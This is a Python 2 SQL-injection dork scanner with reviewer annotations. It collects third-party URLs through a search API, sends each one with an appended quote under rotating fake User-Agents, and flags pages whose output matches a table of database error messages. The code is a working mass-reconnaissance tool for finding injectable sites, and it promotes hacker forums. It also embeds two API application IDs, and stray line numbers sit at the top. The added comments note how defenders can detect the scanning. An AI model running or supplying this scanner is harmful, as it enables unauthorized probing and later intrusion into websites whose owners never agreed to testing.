#!/usr/bin/python |
003 | import sys, subprocess, re, Queue, urllib, urllib2, threading, random |
004 | from xml.dom import minidom |
005 | from optparse import OptionParser |
006 | from time import sleep |
def logo():
    # The banner text this function is meant to print is absent from the
    # listing; `pass` stands in for it so the definition stays valid.
    pass


# Clear the terminal, then show the banner. Anything that does not report
# itself as Linux is handed the Windows "cls" command.
subprocess.call("clear" if sys.platform in ('linux', 'linux2') else "cls", shell=True)
logo()
# Module-wide state shared between the main thread and the workers.
threads, urls, vuln = [], [], []   # unused list / collected URLs / URLs that matched
pager, counter = 50, 0             # links to collect (overridden by -c) / URLs processed so far
# User-Agent strings; each outgoing probe picks one at random.
# From the receiving side this means the same client address shows up with
# a changing mix of long-obsolete browser and crawler identities, which is a
# usable correlation signal in web-server logs.
header = [
    'Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)',
    'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',
    'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',
    'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
    'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
    'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',
    'Microsoft Internet Explorer/4.0b1 (Windows 95)',
    'Opera/8.00 (Windows NT 5.1; U; en)',
    'amaya/9.51 libwww/5.4.0',
    'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',
    'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
    'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
    'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)',
    'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)',
    'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]',
]
# Label -> text searched for in a response body.
# Every value is a fragment of a verbose database or runtime error page, so
# an application that returns a generic error page (and logs the detail
# server-side) gives this table nothing to match.
# NOTE(review): several entries ('Server Error', 'Syntax error',
# 'Not found') are ordinary page text rather than database output, so a hit
# on them says little about the target.
sqlerrors = {
    # -- labelled driver / engine messages --
    'MySQL': 'error in your SQL syntax',
    'MiscError': 'mysql_fetch',
    'MiscError2': 'num_rows',
    'Oracle': 'ORA-01756',
    'JDBC_CFM': 'Error Executing Database Query',
    'JDBC_CFM2': 'SQLServer JDBC Driver',
    'MSSQL_OLEdb': 'Microsoft OLE DB Provider for SQL Server',
    'MSSQL_Uqm': 'Unclosed quotation mark',
    'MS-Access_ODBC': 'ODBC Microsoft Access Driver',
    'MS-Access_JETdb': 'Microsoft JET Database',
    # -- entries whose label is the searched text itself --
    'Error Occurred While Processing Request': 'Error Occurred While Processing Request',
    'Server Error': 'Server Error',
    'Microsoft OLE DB Provider for ODBC Drivers error': 'Microsoft OLE DB Provider for ODBC Drivers error',
    'Invalid Querystring': 'Invalid Querystring',
    'OLE DB Provider for ODBC': 'OLE DB Provider for ODBC',
    'VBScript Runtime': 'VBScript Runtime',
    'ADODB.Field': 'ADODB.Field',
    'BOF or EOF': 'BOF or EOF',
    'ADODB.Command': 'ADODB.Command',
    'JET Database': 'JET Database',
    'mysql_fetch_array()': 'mysql_fetch_array()',
    'Syntax error': 'Syntax error',
    'mysql_numrows()': 'mysql_numrows()',
    'GetArray()': 'GetArray()',
    'FetchRow()': 'FetchRow()',
    'Input string was not in a correct format': 'Input string was not in a correct format',
    'Not found': 'Not found',
}
# Command-line interface: -d (search query), -c (number of links to
# collect) and -t (worker thread count). All three must be supplied.
parser = OptionParser()

parser.add_option("-d", dest="dork", help="Dork for search", type="string")
parser.add_option("-c", dest="scan", help="Number of links to collect", type="int")
parser.add_option("-t", dest="nthreads", help="Number of threads", type="int")

try:
    (options, args) = parser.parse_args()

    # A missing option shows the usage text and ends the run with status 1.
    if options.dork is None or options.scan is None or options.nthreads is None:
        parser.print_help()
        sys.exit(1)

    dork = options.dork
    pager = options.scan        # replaces the default of 50
    nthreads = options.nthreads

except (KeyboardInterrupt):
    print "[-] Exiting, thanx for using tool, please visit ljuska.org & darkartists.info"
    sys.exit(1)
def search(dork, page):
    """Query the search API for *dork* and append the result URLs to ``urls``.

    dork -- search query; URL-quoted before it is placed in the request.
    page -- value sent as the ``web.offset`` parameter.

    Returns nothing; the module-level ``urls`` list is extended in place.
    Network and XML parsing errors are not handled here and propagate to
    the caller.
    """
    global urls

    # NOTE(review): two API application IDs are embedded in the source; one
    # is picked at random per request.
    appids = ['01CDBCA91C590493EE4E91FAF83E5239FEF6ADFD', 'C2B36F733D8DCB48CE2E075CC145014122BE4724']
    appid = random.choice(appids)
    query_fields = (appid, urllib.quote(dork), str(page))
    url = 'http://api.search.live.net/xml.aspx?Appid=%s&query=%s&sources=web&market=en-us&web.count=50&web.offset=%s' % query_fields

    # NOTE(review): the response arrives over plain HTTP and goes straight
    # into xml.dom.minidom, which the Python documentation lists as not
    # hardened against maliciously constructed XML.
    response = urllib2.urlopen(url)
    document = minidom.parse(response)

    # Each <web:Url> element holds one result link as its first child node.
    for node in document.getElementsByTagName('web:Url'):
        urls.append(node.childNodes[0].data)
class vulnScanner(threading.Thread):
    """Worker thread that takes URLs from a shared queue and checks each one.

    For every URL the worker appends a single quote, requests the result
    with a User-Agent picked at random from ``header`` and searches the
    response body for the patterns in ``sqlerrors``. A ``None`` item on the
    queue tells the worker to stop.

    On the receiving server this shows up as one GET per URL whose query
    string ends in an unbalanced ``'``, which access logs and WAF rules can
    key on. An application that uses parameterised queries and returns
    generic error pages produces no match.
    """

    def __init__(self, queue):
        # queue -- Queue.Queue shared by all workers
        self.__queue = queue
        threading.Thread.__init__(self)

    def run(self):
        """Process queue items until the ``None`` sentinel is received."""
        global counter
        # iter(callable, sentinel) calls get() repeatedly and stops at None.
        for url in iter(self.__queue.get, None):
            host = url + "'"
            try:
                probe = urllib2.Request(host)
                probe.add_header('User-Agent', random.choice(header))
                source = urllib2.urlopen(probe).read()
                for label, pattern in sqlerrors.items():
                    # pattern is handed to re.search as a regular expression,
                    # so '.' and '()' in the table are not matched literally.
                    # Only the first matching label is reported per URL.
                    if re.search(pattern, source) and url not in vuln:
                        print "[!] w00t,w00t!: " , host, "Error: " , label , " ---> SQL Injection Found"
                        vuln.append(url)

            except (KeyboardInterrupt):
                # NOTE(review): sys.exit() inside a thread ends that thread
                # only, not the whole process.
                print "[-] Exiting, thanx for using tool, please visit ljuska.org & darkartists.info"
                sys.exit(1)
            except:
                # NOTE(review): every other failure (DNS, timeout, HTTP
                # error status, decoding) is discarded without a trace.
                pass

            # NOTE(review): plain global incremented by every worker with no
            # lock; the main thread polls it to decide when the run is done.
            counter += 1
def startThreads():
    """Start ``nthreads`` workers and feed them every collected URL.

    Reads the module-level ``nthreads`` and ``urls``. Returns nothing and
    does not wait for the workers; completion is tracked by the caller
    through the ``counter`` global.
    """
    queue = Queue.Queue(0)   # maxsize 0: unbounded

    for _ in range(nthreads):
        vulnScanner(queue).start()

    for target in urls:
        queue.put(target)

    # One None per worker so that each of them leaves its loop.
    for _ in range(nthreads):
        queue.put(None)
if __name__ == "__main__":
    # Entry point: print the settings, collect URLs in batches of 50, run
    # the workers and report how many URLs matched an error pattern.
    try:
        print "[!] Dork: %s" % dork
        print "[!] Sites to scan: %s" % pager
        print "[!] Number of threads: %s" % nthreads

        # One search request per 50 requested links (integer division, so a
        # value below 50 issues no request at all).
        for page in range(1, (pager / 50) + 1):
            search(dork, page)
        print "[!] Number of collected urls: %s\\n" % len(urls)

        startThreads()
        # Poll once a second until the workers have counted every URL.
        while counter < len(urls):
            sleep(1)

        print "\\n[!] Vulnerable urls found: %s" % len(vuln)
        print "[-] Exiting, thanx for using tool, please visit ljuska.org & darkartists.info"
        # Exit status is 1 on the normal path as well as on interruption.
        sys.exit(1)
    except (KeyboardInterrupt):
        print "[-] Exiting, thanx for using tool, please visit ljuska.org & darkartists.info"
        sys.exit(1)